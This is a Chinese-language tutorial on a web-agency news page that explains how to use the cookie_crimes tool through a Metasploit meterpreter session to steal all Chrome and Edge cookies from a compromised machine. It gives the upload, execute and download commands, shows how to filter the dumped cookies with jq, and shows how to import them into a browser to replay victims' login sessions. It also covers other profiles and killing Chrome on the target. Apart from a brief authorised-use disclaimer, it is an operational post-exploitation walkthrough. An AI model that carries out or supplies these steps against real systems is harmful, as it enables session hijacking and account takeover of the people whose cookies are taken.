ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

Metasploit 集成教程:如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies

Metasploit 集成教程:如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies Metasploit 集成教程如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies【免费下载链接】cookie_crimesRead local Chrome cookies without root or decrypting项目地址: https://gitcode.com/gh_mirrors/co/cookie_crimes写在前面什么是 cookie_crimescookie_crimes是一款开源的 Chrome Cookie 提取工具它的核心卖点是无需 root 权限、无需用户密码、无需解密就能把目标机器上 Chrome甚至 Edge浏览器的全部 Cookies 以整洁的 JSON 格式导出。在Metasploit渗透测试流程中当你拿到一个meterpreter 会话后把 cookie_crimes 上传到目标机器运行即可快速提取目标用户的登录态 Cookie为后续测试提供关键突破口。本教程将带你一步步完成Metasploit 与 cookie_crimes 的集成并演示如何在 meterpreter 会话中提取 Cookies。⚠️ 安全声明本文内容仅限授权测试渗透测试、CTF、应急响应、自有设备。未经授权使用属于违法行为请勿用于非法用途。cookie_crimes 的核心功能一览在动手集成之前先快速了解这个工具能做什么功能特性说明 免权限提取不需要 root、不需要用户密码也不需要解密 Cookies 数据库 跨平台支持覆盖 Windows、Linux、macOS 三大系统 多浏览器兼容支持 Chrome也支持基于 Chromium 的 Microsoft Edge JSON 输出输出格式与 EditThisCookie 扩展兼容可直接导入 任意 Profile可通过修改配置提取任意 Chrome 用户资料目录的 Cookies 单文件编译可编译成独立二进制方便在目标机器上执行核心原理很简单cookie_crimes 启动一个带--headless和--remote-debugging-port9222参数的 Chrome 实例并指向目标的用户数据目录然后通过 WebSocket 调用 Chrome DevTools 协议的Network.getAllCookies接口把 Cookies 一次性拉取出来。整个逻辑都在主脚本 cookie_crimes.py 中。Metasploit 集成前置准备在开始集成前请确认满足以下条件本地环境Python 3.6用于编译二进制Metasploit已安装且已建立目标机器的 meterpreter 会话目标机器安装有 Chrome 或 Edge且会话权限能执行命令。第一步获取 cookie_crimes 源码在本地与目标同系统的机器克隆项目git clone https://gitcode.com/gh_mirrors/co/cookie_crimes cd cookie_crimes第二步编译单文件二进制推荐直接把 Python 脚本上传到目标机器也能运行但目标机器未必有 Python 环境。更稳妥的做法是编译成单文件二进制这也是官方推荐的用法。项目自带的 Makefile 封装了编译命令pip3 install -r requirements.txt makemake实际执行的是pyinstaller -F cookie_crimes.py编译产物会生成在dist/目录下。 注意该项目不支持交叉编译在哪个系统上编译产物就只能跑在哪个系统上。请务必在与你目标机器相同的操作系统上完成编译。第三步在 meterpreter 会话中上传二进制拿到 meterpreter 会话后把编译好的二进制上传到目标机器的临时目录meterpreter upload /path/to/dist/cookie_crimes /tmp/cookie_crimes meterpreter shell如果上传后没有执行权限在 shell 中补一个chmod x即可。第四步在 meterpreter 会话中执行并提取 Cookies进入目标的 shell 后直接运行二进制将输出重定向到文件cd /tmp ./cookie_crimes cookies.json工具会自动完成启动 headless Chrome → 连接远程调试端口 → 调用协议拉取 Cookies → 清理进程的完整流程。几秒钟后cookies.json中就保存了目标浏览器全部站点的 Cookies而且是纯文本形式直接可读。第五步回传并解析 Cookies把结果下载回本地进行分析meterpreter download /tmp/cookies.json然后本地用jq快速过滤出你关心的站点cat cookies.json | jq .[] | select(.domain | contains(example.com))如果想把 Cookies 导入本地 Chrome 浏览器配合 EditThisCookie 扩展复现登录态可以用项目附带的格式化脚本 format_for_editthiscookie.sh 去掉域名开头的点号cat cookies.json | ./format_for_editthiscookie.sh进阶技巧提取指定 Chrome Profile 的 Cookies默认情况下 cookie_crimes 提取的是 Default 资料目录。如果目标用户在 Chrome 中创建了多个 Profile例如 Profile 1只需修改 cookie_crimes.py 顶部的PROFILE_NAME变量再重新编译即可PROFILE_NAME Profile 1工具会通过复制用户资料目录到/tmp的巧妙方式让 Chrome 误以为该目录就是默认资料从而读出对应 Profile 的 Cookies。常见问题排查提取结果为空目标 Chrome 可能正在运行导致用户数据目录被占用可先在目标机器上结束 Chrome 进程再执行macOS 上偶发失败由于 Chrome 更新频繁--headless方式在 macOS 上时好时坏。此时可改用项目附带的 cookie_crimes_macos.sh 脚本它会重启 Chrome 并附加远程调试来读取 Cookies目标没有 Python这正是先编译单文件二进制再上传的原因二进制不依赖目标机器的 Python 环境。总结通过 Metasploit 的 meterpreter 会话集成 cookie_crimes你可以在无需 root、无需密码的情况下快速拿到目标浏览器的完整 Cookie 数据。整个过程只需四步获取源码 → 编译二进制 → 上传执行 → 回传解析。它尤其适合在授权渗透测试中快速评估目标账号的安全状况。记住技术本身是中立的请务必只在授权范围内使用 cookie_crimes做一个守法的安全研究者。️【免费下载链接】cookie_crimesRead local Chrome cookies without root or decrypting项目地址: https://gitcode.com/gh_mirrors/co/cookie_crimes创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表